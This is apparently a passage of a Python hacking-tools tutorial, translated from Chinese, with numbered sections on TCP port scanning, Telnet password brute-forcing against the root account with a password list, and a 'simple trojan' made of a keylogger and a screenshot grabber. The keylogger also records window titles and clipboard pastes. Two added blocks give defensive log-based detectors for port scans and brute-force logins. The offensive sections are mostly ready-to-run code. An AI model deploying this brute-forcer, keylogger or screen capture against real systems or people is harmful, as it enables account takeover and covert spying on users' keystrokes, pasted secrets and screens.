class Start(QtGui.QMainWindow):

    def __init__(self, parent=None):
        QtGui.QMainWindow.__init__(self, parent)
        self.ui = Ui_Form()
        self.ui.setupUi(self)
        self.ui.iniA()

if __name__ == '__main__':
    app = QtGui.QApplication(sys.argv)
    myapp = Start()
    myapp.show()
    sys.exit(app.exec_())

# -*- coding: utf-8 -*-

import ConfigParser

IP1 = ""    # start IP
IP2 = ""    # IP the scan has reached so far
port = ""   # port to scan
INITXT = "IP.ini"   # INI file name

def ini_get():  # read the INI file
    try:
        global IP1
        global IP2
        global port
        config = ConfigParser.ConfigParser()
        config.readfp(open(INITXT))
        IP1 = config.get("ipdata", "ip1")
        IP2 = config.get("ipdata", "ip2")
        port = config.get("ipdata", "port")
    except:
        print "读取INI错误"
        ini_add("", "", "")   # create a fresh INI file

def ini_add(ip1, ip2, pt):  # create the INI file
    try:
        config = ConfigParser.ConfigParser()
        config.add_section("ipdata")    # the section and its keys
        config.set("ipdata", "ip1", ip1)
        config.set("ipdata", "ip2", ip2)
        config.set("ipdata", "port", pt)  # same key name that ini_get() reads
        config.write(open(INITXT, "w"))  # write the file
    except:
        print "写入INI错误"

def ini_write(ip1, ip2, pt):  # update the INI file
    try:
        config = ConfigParser.ConfigParser()
        config.read(INITXT)
        if not config.has_section("ipdata"):    # create the section if it is missing
            config.add_section("ipdata")
        config.set("ipdata", "ip1", ip1)
        config.set("ipdata", "ip2", ip2)
        config.set("ipdata", "port", pt)
        config.write(open(INITXT, "w"))
    except:
        print "修改INI错误"
        ini_add("", "", "")  # create a fresh INI file

14、TCP port scanning

# -*- coding: utf-8 -*-

from socket import *

# simple connect scan
def PortScanner(host, port):
    try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, port))
        print("[+] %d open" % port)
        s.close()
    except:
        print("[-] %d closed" % port)

def main():
    setdefaulttimeout(1)
    for p in range(20, 100):
        PortScanner('192.168.1.3', p)

if __name__ == '__main__':
    main()

# -*- coding: utf-8 -*-

from socket import *
import threading

lock = threading.Lock()
openNum = 0
threads = []

# threaded connect scan
def PortScanner(host, port):
    global openNum
    try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, port))
        lock.acquire()      # lock the shared counter
        openNum += 1
        print("[+] %d open" % port)
        lock.release()  # unlock
        s.close()
    except:
        pass

def main():
    setdefaulttimeout(1)
    for p in range(1, 1024):     # port range
        t = threading.Thread(target=PortScanner, args=('192.168.1.3', p))
        threads.append(t)   # keep the thread so it can be joined
        t.start()
    for t in threads:
        t.join()
    print("[*] The scan is complete!")
    print("[*] a total of %d open ports" % (openNum))

if __name__ == '__main__':
    main()
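Added example (Python 3, not code from the original page) for the defender's side of sections 13 and 14: the connect() scanners above leave one TCP SYN per port in a firewall log, so a source touching many distinct destination ports within a few seconds stands out. The log lines below are constructed in iptables LOG format (only the timestamp, SRC, PROTO, DPT and SYN fields are read); the window and threshold are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime

WINDOW = 5       # seconds
MIN_PORTS = 10   # distinct destination ports inside one window that count as a scan

# Fields read from an iptables LOG line: timestamp, SRC, DPT and the SYN flag.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ kernel: .*?SRC=(?P<src>\S+) .*?PROTO=TCP "
    r".*?DPT=(?P<dpt>\d+) .*?\bSYN\b")

def parse(line, year=2024):
    """Return (time, src, dport) for a logged TCP SYN, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["src"], int(m["dpt"])

def detect_scans(lines, window=WINDOW, min_ports=MIN_PORTS):
    """Return {src: most distinct ports seen from src within any `window` seconds}
    for every source that reached `min_ports`."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse(line)
        if parsed:
            ts, src, dpt = parsed
            events[src].append((ts, dpt))
    alerts = {}
    for src, evs in events.items():
        evs.sort()
        best, start = 0, 0
        for end in range(len(evs)):
            while (evs[end][0] - evs[start][0]).total_seconds() > window:
                start += 1
            best = max(best, len({dpt for _, dpt in evs[start:end + 1]}))
        if best >= min_ports:
            alerts[src] = best
    return alerts

def make_line(hhmmss, src, dpt, proto="TCP"):
    """Constructed log line in iptables LOG format (MAC and counters are dummies)."""
    return (f"Jan 10 {hhmmss} gw kernel: [12.3] IN=eth0 OUT= MAC=00:11:22:33:44:55:66:77:88:99:aa:bb:08:00 "
            f"SRC={src} DST=192.168.1.3 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=1 DF PROTO={proto} "
            f"SPT=4{dpt:04d} DPT={dpt} WINDOW=29200 RES=0x00 SYN URGP=0")

SAMPLE_LOG = (
    [make_line(f"12:00:0{i // 10}", "10.0.0.5", 20 + i) for i in range(30)]             # 30 ports in 3 s: a scan
    + [make_line(f"12:00:{i:02d}", "10.0.0.9", 80 if i % 2 else 443) for i in range(20)]  # a busy web client
    + [make_line(f"12:{i:02d}:00", "10.0.0.7", 100 + i) for i in range(6)]             # one new port per minute
    + [make_line("12:00:05", "10.0.0.5", 53, proto="UDP")]                             # not TCP: ignored
)

if __name__ == "__main__":
    for src, n in detect_scans(SAMPLE_LOG).items():
        print(f"[!] {src} touched {n} distinct ports within {WINDOW}s")
    for src, n in detect_scans(SAMPLE_LOG, window=600, min_ports=5).items():
        print(f"[!] slow: {src} touched {n} distinct ports within 10 min")
```

With the default window only the fast scanner is reported; widening the window to ten minutes and lowering the threshold also catches the source probing one port per minute.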

15、Telnet password brute-forcing

# -*- coding: utf-8 -*-

import telnetlib
import time
import sys
import os

def do_telnet(Host, Port, username, password, finish):
    # connect to the Telnet server
    tn = telnetlib.Telnet(Host, Port, timeout=1)
    tn.set_debuglevel(3)
    # send the user name
    tn.read_until("login: ")
    tn.write(str(username) + '\n')
    # send the password
    tn.read_until("Password: ")
    tn.write(str(password) + '\n')
    # look for the failure banner; if it does not appear the login went through
    if finish in tn.read_until(finish, timeout=2):
        print "[-]Login Failed\n"
    tn.close()

if __name__ == '__main__':
    Host = raw_input("IP:")          # Telnet server IP
    Port = int(raw_input("Port:"))   # Telnet server port
    username = 'root'                # user name to log in with
    finish = 'incorrect'             # text of the failure banner
    pw_file = open('pass.txt', 'r')  # password list
    Index = 0
    print time.asctime(), ": begin", "\n"
    while True:
        password = pw_file.readline()
        Index += 1
        print Index, time.asctime(), "Try", "", username, ":", password, ""
        if len(password) == 0:
            break
        do_telnet(Host, Port, username, password.strip(), finish)
    pw_file.close()
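Added example (Python 3, not code from the original page) covering the detection side of both section 12 and section 15: the brute-forcers above try many passwords for one account from one source, which shows up as a burst of failed logins. The parser reads two constructed log formats, MySQL 8's error-log "Access denied" line and the syslog line that util-linux login(1) writes for a failed telnet login; window and threshold are assumed values.

```python
import re
from collections import defaultdict
from datetime import datetime

# Failure lines the two tools above would leave behind (formats as described in the lead-in).
MYSQL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d)\.\d+Z .*Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<src>[^']*)'")
LOGIN_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ login\[\d+\]: FAILED LOGIN \(\d+\) on '[^']*' "
    r"from '(?P<src>[^']*)' FOR '(?P<user>[^']*)'")

def parse_failure(line, year=2024):
    """Return (service, time, src, user) for a failed-login line, else None."""
    m = MYSQL_RE.match(line)
    if m:
        return "mysql", datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S"), m["src"], m["user"]
    m = LOGIN_RE.match(line)
    if m:
        return "telnet", datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"), m["src"], m["user"]
    return None

def detect_bruteforce(lines, window=60, threshold=10):
    """Return {(service, src, user): failures} for every account/source pair with
    at least `threshold` failed logins inside some `window`-second span."""
    events = defaultdict(list)
    for line in lines:
        f = parse_failure(line)
        if f:
            service, ts, src, user = f
            events[(service, src, user)].append(ts)
    alerts = {}
    for key, times in events.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[key] = best
    return alerts

def mysql_line(sec, src, user="root"):
    """Constructed MySQL 8 error-log line."""
    return (f"2024-01-10T12:00:{sec:02d}.123456Z 42 [Warning] [MY-010926] [Server] "
            f"Access denied for user '{user}'@'{src}' (using password: YES)")

def login_line(sec, src, user="root"):
    """Constructed syslog line from login(1) for a failed telnet login."""
    return (f"Jan 10 12:00:{sec:02d} host login[1234]: FAILED LOGIN ({sec + 1}) on '/dev/pts/1' "
            f"from '{src}' FOR '{user}', Authentication failure")

SAMPLE_LOG = (
    [mysql_line(s, "10.0.0.5") for s in range(25)]               # 25 root failures in 25 s: wordlist run
    + [mysql_line(s * 2, "10.0.0.8", "app") for s in range(3)]   # three failures: a mistyped app password
    + [login_line(s, "10.0.0.5") for s in range(12)]             # the same host hammering telnet
    + ["Jan 10 12:00:40 host sshd[2000]: Accepted publickey for alice from 10.0.0.20 port 51000 ssh2"]
)

if __name__ == "__main__":
    for (service, src, user), n in detect_bruteforce(SAMPLE_LOG).items():
        print(f"[!] {service}: {n} failed logins for '{user}' from {src} within 60s")
```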

16、A simple trojan program

# -*- coding: utf-8 -*-

from ctypes import *
import pythoncom
import pyHook
import win32clipboard

user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi
current_window = None

def get_current_process():
    # handle of the foreground window
    hwnd = user32.GetForegroundWindow()

    # process ID that owns it
    pid = c_ulong(0)
    user32.GetWindowThreadProcessId(hwnd, byref(pid))

    # keep the process ID as a string
    process_id = "%d" % pid.value

    # buffer for the executable name
    executable = create_string_buffer("\x00" * 512)
    h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)

    psapi.GetModuleBaseNameA(h_process, None, byref(executable), 512)

    # read the window title
    windows_title = create_string_buffer("\x00" * 512)
    length = user32.GetWindowTextA(hwnd, byref(windows_title), 512)

    # print it
    print
    print "[ PID: %s-%s-%s ]" % (process_id, executable.value, windows_title.value)
    print

    # close the handles
    kernel32.CloseHandle(hwnd)
    kernel32.CloseHandle(h_process)

# keystroke event handler
def KeyStroke(event):
    global current_window

    # if the foreground window changed, report the new one
    if event.WindowName != current_window:
        current_window = event.WindowName

        # report the process behind it
        get_current_process()

    # ordinary printable keys (not modifier combinations)
    if event.Ascii > 32 and event.Ascii < 127:
        print chr(event.Ascii)
    else:
        # on a Ctrl+V (paste) event, record the clipboard contents
        if event.Key == "V":
            win32clipboard.OpenClipboard()
            pasted_value = win32clipboard.GetClipboardData()
            win32clipboard.CloseClipboard()
            print "[PASTE]-%s" % (pasted_value),
        else:
            print "[%s]" % event.Key

    # keep listening for the next keystroke
    return True

# create and register the hook manager
k1 = pyHook.HookManager()
k1.KeyDown = KeyStroke

# install the hook and run the message loop
k1.HookKeyboard()
pythoncom.PumpMessages()

# -*- coding: utf-8 -*-

import win32gui
import win32ui
import win32con
import win32api

# desktop window handle
hdesktop = win32gui.GetDesktopWindow()

# size and origin of the whole virtual screen
width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN)
left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN)
top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN)

# device context for the desktop
desktop_dc = win32gui.GetWindowDC(hdesktop)
img_dc = win32ui.CreateDCFromHandle(desktop_dc)

# memory device context to draw into
mem_dc = img_dc.CreateCompatibleDC()

# bitmap object
screenshot = win32ui.CreateBitmap()
screenshot.CreateCompatibleBitmap(img_dc, width, height)
mem_dc.SelectObject(screenshot)

# copy the screen into the memory device context
mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY)

# save the capture to a file
screenshot.SaveBitmapFile(mem_dc, 'C:\\Users\\Administrator\\Desktop\\Screenshots.bmp')

# release resources
mem_dc.DeleteDC()
win32gui.DeleteObject(screenshot.GetHandle())
